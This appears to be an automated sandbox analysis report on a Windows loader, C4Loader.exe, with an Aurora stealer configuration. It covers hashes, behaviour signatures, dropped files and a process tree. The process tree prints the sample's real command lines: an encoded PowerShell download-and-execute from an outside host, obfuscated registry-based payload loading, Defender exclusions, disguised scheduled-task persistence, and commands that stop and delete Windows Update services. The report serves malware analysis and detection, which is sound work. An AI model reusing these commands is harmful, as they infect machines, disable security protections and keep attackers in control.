Analysis
-
max time kernel
150s -
max time network
34s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
03-04-2023 09:55
Static task
static1
Behavioral task
behavioral1
Sample
C4Loader.exe
Resource
win7-20230220-en
General
-
Target
C4Loader.exe
-
Size
856KB
-
MD5
3b8f84a1a0761f8bab9d6b0a90e6949e
-
SHA1
9c758991135d977d2660f1b814b973db0e119efc
-
SHA256
2bcbbe13d000426f4be27871e3c472dbf33673551a684229e9234e6387b045e1
-
SHA512
3bae19a2a3abddc66faf78cab3caf99aa1988607ca844294d37450a7eb3be2454ae1a4034e38df4dabef63a2f8fd5b9084fccfcaf3d2b72ff5c62cb79bdae2e1
-
SSDEEP
3072:HnoTMG2OWGJAez/eyN/09XMT9THz4JHSV0h2sFeJOMkdIGq:HYfAebec09Q0ZwQCGq
Malware Config
Extracted
aurora
107.182.129.73:8081
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
Processes:
SmartDefRun.exepowershell.EXEdescription pid process target process PID 1944 created 1208 1944 SmartDefRun.exe Explorer.EXE PID 1944 created 1208 1944 SmartDefRun.exe Explorer.EXE PID 1944 created 1208 1944 SmartDefRun.exe Explorer.EXE PID 1944 created 1208 1944 SmartDefRun.exe Explorer.EXE PID 1160 created 416 1160 powershell.EXE winlogon.exe -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 4 432 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
Processes:
SmartDefRun.exedescription ioc process File created C:\Windows\System32\drivers\etc\hosts SmartDefRun.exe -
Stops running service(s) 3 TTPs
-
Executes dropped EXE 5 IoCs
Processes:
C4Loader.exenew2.exeSysApp.exeSmartDefRun.exefodhelper.exepid process 1500 C4Loader.exe 1284 new2.exe 1436 SysApp.exe 1944 SmartDefRun.exe 1960 fodhelper.exe -
Loads dropped DLL 7 IoCs
Processes:
powershell.exepid process 432 powershell.exe 432 powershell.exe 432 powershell.exe 432 powershell.exe 432 powershell.exe 432 powershell.exe 432 powershell.exe -
Drops file in System32 directory 6 IoCs
Processes:
powershell.exepowershell.exepowershell.EXEpowershell.EXEsvchost.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File created C:\Windows\System32\Tasks\Telemetry Logging svchost.exe File opened for modification C:\Windows\System32\Tasks\Telemetry Logging svchost.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
C4Loader.exeSmartDefRun.exepowershell.EXEdescription pid process target process PID 864 set thread context of 1260 864 C4Loader.exe InstallUtil.exe PID 1944 set thread context of 2012 1944 SmartDefRun.exe dialer.exe PID 1160 set thread context of 1016 1160 powershell.EXE dllhost.exe -
Drops file in Program Files directory 1 IoCs
Processes:
SmartDefRun.exedescription ioc process File created C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe SmartDefRun.exe -
Drops file in Windows directory 1 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\appcompat\programs\RecentFileCache.bcf svchost.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid process 804 sc.exe 1260 sc.exe 1692 sc.exe 1384 sc.exe 1788 sc.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 2 IoCs
Processes:
powershell.EXEdescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 4002d24f2366d901 powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeSmartDefRun.exepowershell.exepowershell.exeSysApp.exepowershell.EXEpowershell.EXEdllhost.exepid process 432 powershell.exe 432 powershell.exe 432 powershell.exe 432 powershell.exe 432 powershell.exe 432 powershell.exe 432 powershell.exe 432 powershell.exe 432 powershell.exe 1944 SmartDefRun.exe 1944 SmartDefRun.exe 1996 powershell.exe 1944 SmartDefRun.exe 1944 SmartDefRun.exe 1944 SmartDefRun.exe 1944 SmartDefRun.exe 884 powershell.exe 1436 SysApp.exe 1944 SmartDefRun.exe 1944 SmartDefRun.exe 1436 SysApp.exe 1436 SysApp.exe 1436 SysApp.exe 1436 SysApp.exe 1160 powershell.EXE 1056 powershell.EXE 1160 powershell.EXE 1016 dllhost.exe 1016 dllhost.exe 1016 dllhost.exe 1016 dllhost.exe 1016 dllhost.exe 1016 dllhost.exe 1016 dllhost.exe 1016 dllhost.exe 1016 dllhost.exe 1016 dllhost.exe 1016 dllhost.exe 1016 dllhost.exe 1016 dllhost.exe 1016 dllhost.exe 1016 dllhost.exe 1016 dllhost.exe 1016 dllhost.exe 1016 dllhost.exe 1016 dllhost.exe 1016 dllhost.exe 1016 dllhost.exe 1016 dllhost.exe 1016 dllhost.exe 1016 dllhost.exe 1016 dllhost.exe 1016 dllhost.exe 1016 dllhost.exe 1016 dllhost.exe 1016 dllhost.exe 1016 dllhost.exe 1016 dllhost.exe 1016 dllhost.exe 1016 dllhost.exe 1016 dllhost.exe 1016 dllhost.exe 1016 dllhost.exe 1016 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 1208 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 10 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.EXEpowershell.EXEdllhost.exesvchost.exeExplorer.EXEdescription pid process Token: SeDebugPrivilege 432 powershell.exe Token: SeDebugPrivilege 1996 powershell.exe Token: SeDebugPrivilege 884 powershell.exe Token: SeDebugPrivilege 1160 powershell.EXE Token: SeDebugPrivilege 1056 powershell.EXE Token: SeDebugPrivilege 1160 powershell.EXE Token: SeDebugPrivilege 1016 dllhost.exe Token: SeAuditPrivilege 840 svchost.exe Token: SeShutdownPrivilege 1208 Explorer.EXE Token: SeShutdownPrivilege 1208 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
C4Loader.exeInstallUtil.exepowershell.exedescription pid process target process PID 864 wrote to memory of 1680 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1680 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1680 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1680 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1680 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1680 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1680 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1680 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1312 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1312 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1312 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1312 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1312 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1312 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1312 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1312 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1324 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1324 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1324 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1324 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1324 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1324 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1324 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1324 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1340 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1340 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1340 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1340 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1340 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1340 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1340 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1340 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1260 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1260 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1260 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1260 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1260 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1260 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1260 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1260 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1260 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1260 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1260 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1260 864 C4Loader.exe InstallUtil.exe PID 864 wrote to memory of 1260 864 C4Loader.exe InstallUtil.exe PID 1260 wrote to memory of 432 1260 InstallUtil.exe powershell.exe PID 1260 wrote to memory of 432 1260 InstallUtil.exe powershell.exe PID 1260 wrote to memory of 432 1260 InstallUtil.exe powershell.exe PID 1260 wrote to memory of 432 1260 InstallUtil.exe powershell.exe PID 432 wrote to memory of 1500 432 powershell.exe C4Loader.exe PID 432 wrote to memory of 1500 432 powershell.exe C4Loader.exe PID 432 wrote to memory of 1500 432 powershell.exe C4Loader.exe PID 432 wrote to memory of 1500 432 powershell.exe C4Loader.exe PID 432 wrote to memory of 1284 432 powershell.exe new2.exe PID 432 wrote to memory of 1284 432 powershell.exe new2.exe PID 432 wrote to memory of 1284 432 powershell.exe new2.exe PID 432 wrote to memory of 1284 432 powershell.exe new2.exe PID 432 wrote to memory of 1436 432 powershell.exe SysApp.exe PID 432 wrote to memory of 1436 432 powershell.exe SysApp.exe PID 432 wrote to memory of 1436 432 powershell.exe SysApp.exe PID 432 wrote to memory of 1436 432 powershell.exe SysApp.exe PID 432 wrote to memory of 1944 432 powershell.exe SmartDefRun.exe PID 432 wrote to memory of 1944 432 powershell.exe SmartDefRun.exe PID 432 wrote to memory of 1944 432 powershell.exe SmartDefRun.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
\\?\C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R3⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {92F8EEC5-9304-43D3-822E-535F4EB1BE81} S-1-5-18:NT AUTHORITY\System:Service:3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+'F'+'T'+[Char](87)+''+'A'+''+'R'+''+[Char](69)+'').GetValue(''+[Char](100)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'e'+''+[Char](114)+'st'+'a'+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+'T'+''+[Char](87)+''+[Char](65)+'RE').GetValue(''+[Char](100)+''+'i'+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](114)+''+'s'+''+[Char](116)+''+[Char](97)+'g'+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskeng.exetaskeng.exe {B7EC0C21-949F-4D8B-AFBF-36D7AC52B1F0} S-1-5-21-3430344531-3702557399-3004411149-1000:WFSTZEPN\Admin:Interactive:[1]3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exeC:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe4⤵
- Executes dropped EXE
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{469c760b-0ea9-4588-bfd7-e51db5cab99f}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAZgBuACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdQB1AHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcgBuAHkAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZQBlAG4AIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwB5AHYAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHYAaQBoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAZgBxACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwBoAGMAcQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGcAcwB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagBwAG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBzAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBqAHYAeAAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBxAHkAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAdAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGkAeQBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAGUAaABkACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBiAHgAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAYwBiACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAZwBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwB1AHIAZAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB0AGoAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBqAHMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBwAGMAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBxAGkAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagBqAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAeQB5AGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwBzAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbAB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB0AGoAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB2AHIAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagByAHcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBwAGcAdQAjAD4A"4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\new2.exe"C:\Users\Admin\AppData\Local\Temp\new2.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exe"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"6⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#kryoeujoq#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenMachine' /tr '''C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenMachine' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenMachine" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn WindowsDefenderSmartScreenMachine /tr "'C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe'"3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "965076851-19281899968757584616414633351727989461-12648548101031971110-1792255165"1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exeFilesize
1.4MB
MD5bcaae53dc3d930c6ed4642e945fab93d
SHA1ba3391fb65a312431432dc2339abadce73c0d81a
SHA2566314f08fdcfb8983ddfb8aa7ef8b3b323748b68aead42263c1ae1fec17320368
SHA5129d7fc038d0cc746b2149359df62751110e0c49d33fed4bd286921e357306a1977cd57954104c545d96e61f36fe96df1e69c137f2d22ac9413eca08018316a9f5
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exeFilesize
1.4MB
MD5bcaae53dc3d930c6ed4642e945fab93d
SHA1ba3391fb65a312431432dc2339abadce73c0d81a
SHA2566314f08fdcfb8983ddfb8aa7ef8b3b323748b68aead42263c1ae1fec17320368
SHA5129d7fc038d0cc746b2149359df62751110e0c49d33fed4bd286921e357306a1977cd57954104c545d96e61f36fe96df1e69c137f2d22ac9413eca08018316a9f5
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exeFilesize
1.4MB
MD5bcaae53dc3d930c6ed4642e945fab93d
SHA1ba3391fb65a312431432dc2339abadce73c0d81a
SHA2566314f08fdcfb8983ddfb8aa7ef8b3b323748b68aead42263c1ae1fec17320368
